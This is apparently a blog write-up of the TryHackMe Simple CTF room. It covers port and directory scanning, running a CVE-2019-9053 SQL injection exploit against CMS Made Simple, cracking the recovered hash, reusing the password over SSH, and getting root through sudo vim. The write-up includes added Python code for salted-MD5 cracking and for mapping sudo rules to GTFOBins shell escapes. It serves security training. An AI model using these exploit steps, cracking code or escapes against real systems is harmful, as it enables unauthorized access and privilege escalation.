Room: https://tryhackme.com/room/easyctf
The past few days, I have been learning the actual details of cybersecurity from the All-In-One CompTIA PenTest+ Exam Guide by Ray Nutting.
Today we tackle the Simple CTF room and hopefully some of the concepts from the book will help me here again.
Enumeration
Port Scan
It is always good to start with an nmap scan: nmap -v -A 10.10.147.64 (the -A flag adds version detection, OS detection and default scripts on top of the port scan). This nets us 3 open ports:
- 21/tcp – ftp – vsftpd 3.0.3
  - Anonymous FTP login allowed
- 80/tcp – http – Apache httpd 2.4.18 ((Ubuntu))
- 2222/tcp – ssh – OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (note the non-standard port)
Web Scan
We know there is a web server on port 80, but it only shows the default Apache 2 Ubuntu page, so we run gobuster to discover any useful paths on it:
gobuster dir -u 10.10.147.64 -w /usr/share/wordlists/dirb/common.txt
===============================================================
2021/03/29 16:16:15 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2021/03/29 16:16:18 Finished
===============================================================
The robots.txt and /simple are interesting, so let's check them out in the browser.
The robots.txt contains a single rule: Disallow: /openemr-5_0_1_3. Navigating to that directory returns a Not Found error, so it is a dead end.
Navigating to /simple gives us a website that identifies itself as powered by CMS Made Simple version 2.2.8.
Vulnerability Search
First, let’s start with the application that we know is running, CMS Made Simple version 2.2.8:
searchsploit cms made simple 2.2.8
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
---------------------------------------------- ---------------------------------
We get a hit! Opening the exploit's Exploit-DB page in the browser, we see it is CVE-2019-9053, an unauthenticated blind SQL injection in CMS Made Simple before 2.2.10. The Python script uses the injection to pull the password salt, username, email and password hash out of the database and, with --crack, tries each word of a wordlist against the hash. I copied the text into sublime editor, and saved it as ~/cve.py.
Now we just need to run the script (it is written for Python 2, so invoke it with python2):
python2 cve.py -u http://10.10.147.64/simple --crack -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best110.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]
[+] Password found: 0c01f4468bd75d7a84c7eb73846e----
[+] Password cracked: <redacted>
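The offline cracking step that the script's --crack option performs, reimplemented here as an added example (this is not the exploit's code or the author's) so you can re-run it against a different wordlist once the salt and hash have been pulled. The salt is the one printed above; the hash and the wordlist are constructed for the example because the page redacts the real hash. The scheme is assumed to be md5(salt + password), which is what the exploit's cracking routine computes, and the function refuses a redacted or truncated digest like the one shown above rather than silently burning through the wordlist.

```python
import hashlib
import string

# Salt as printed by the exploit above. The hash and wordlist are CONSTRUCTED for this
# example (the writeup redacts the real hash), so the expected answer is known up front.
SALT = "1dac0d92e9fa6bb2"
SAMPLE_WORDLIST = ["password", "letmein", "123456", "sunshine", "qwerty123"]
SAMPLE_HASH = hashlib.md5((SALT + "sunshine").encode("utf-8")).hexdigest()


def cmsms_hash(salt, password):
    """md5(salt + password): the scheme the exploit's --crack routine computes
    (assumed here to match how CMS Made Simple 2.2.x stores user passwords)."""
    return hashlib.md5((salt + password).encode("utf-8")).hexdigest()


def crack(salt, target_hash, candidates):
    """Return the first candidate whose salted MD5 equals target_hash, else None.

    Refuses anything that is not a complete 32-hex-digit digest: a redacted or
    truncated hash (like the one shown in the writeup) can never match, so failing
    loudly beats silently exhausting the wordlist.
    """
    target_hash = target_hash.strip().lower()
    if len(target_hash) != 32 or any(c not in string.hexdigits for c in target_hash):
        raise ValueError("need a full 32-hex-char MD5 digest, got %r" % target_hash)
    for word in candidates:
        word = word.rstrip("\r\n")  # tolerate lines read straight from a wordlist file
        if cmsms_hash(salt, word) == target_hash:
            return word
    return None


def crack_from_file(salt, target_hash, path):
    """Same as crack() but streams a wordlist such as best110.txt from disk."""
    with open(path, "r", encoding="latin-1") as fh:
        return crack(salt, target_hash, fh)


if __name__ == "__main__":
    print(crack(SALT, SAMPLE_HASH, SAMPLE_WORDLIST))
```

To use it on the real target, pass the full hash the script printed (before redaction) and the path of the SecLists wordlist to crack_from_file; a None result simply means the password is not in that list, not that the hash is wrong.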
Gaining Access
With one account pulled from the DB, we can check whether this user reuses the same password on other services, such as SSH on port 2222: ssh mitch@10.10.147.64 -p2222. He does! We have a shell now, so let's look around.
- There is a user.txt file in mitch's home directory; cat it for the first flag.
- cd .. reveals another home directory, belonging to a user called sunbath.
- sudo -l reveals that mitch is allowed to run vim as root with no password. This is our entry point for PrivEsc; GTFOBins has the syntax.
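Added example (not the author's code): a small Python 3 parser for sudo -l output that extracts every rule, flags the NOPASSWD ones and maps each binary to the matching GTFOBins sudo entry, so the step above can be repeated quickly on other boxes. The sample output is constructed to look like what sudo -l prints on Ubuntu: only the vim rule comes from the writeup; the hostname, the Defaults line and the second rule are invented to exercise the parser. The ESCAPES table holds a few GTFOBins entries, not the full list.

```python
import re
from pathlib import PurePosixPath

# CONSTRUCTED sample in the shape `sudo -l` prints on Ubuntu. The vim rule is the
# one the writeup reports for mitch; the hostname, the Defaults line and the
# second rule are made up to exercise the parser.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (ALL : ALL) /bin/ls, /usr/bin/find
"""

# A handful of GTFOBins "Sudo" entries: what to type once a rule lets you run the
# binary as root. Only binaries with a known shell escape need to be listed.
ESCAPES = {
    "vim": "sudo vim -c ':!/bin/sh'",
    "vi": "sudo vi -c ':!/bin/sh'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "env": "sudo env /bin/sh",
    "less": "sudo less /etc/profile  (then type !/bin/sh at the pager prompt)",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule as sudo -l prints it: "(runas) [TAG: ...] cmd[, cmd...]".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:(?:NO)?(?:PASSWD|SETENV|EXEC):\s*)*)"
    r"(?P<cmds>\S.*)$"
)


def parse_sudo_l(text):
    """Turn `sudo -l` output into a list of rule dicts, one per command."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules:
            continue  # still inside the Defaults section
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            name = PurePosixPath(cmd.split()[0]).name
            escape = "sudo /bin/sh" if cmd == "ALL" else ESCAPES.get(name)
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": nopasswd,
                "command": cmd,
                "escape": escape,
            })
    return rules


def privesc_candidates(text):
    """Rules that lead to a root shell, password-less ones first (those work even
    when, unlike here, you have a shell but not the user's password)."""
    cands = [r for r in parse_sudo_l(text) if r["escape"]]
    return sorted(cands, key=lambda r: not r["nopasswd"])


if __name__ == "__main__":
    for r in privesc_candidates(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if r["nopasswd"] else "password"
        print("%-8s %-20s -> %s" % (tag, r["command"], r["escape"]))
```

Feed it the real output with parse_sudo_l(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout); a rule whose command carries arguments is restricted to exactly those arguments by sudoers, so check the escape still fits before relying on it.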
PrivEsc
Searching for vim on GTFOBins gives this command for a root shell:
sudo vim -c ':!/bin/sh'
The -c option makes vim run the ex command ':!/bin/sh', which spawns a shell as a sub-process; since sudo started vim as root, the shell is root too. We can verify this by running whoami, then cd /root and cat the root.txt file in that directory for the final flag!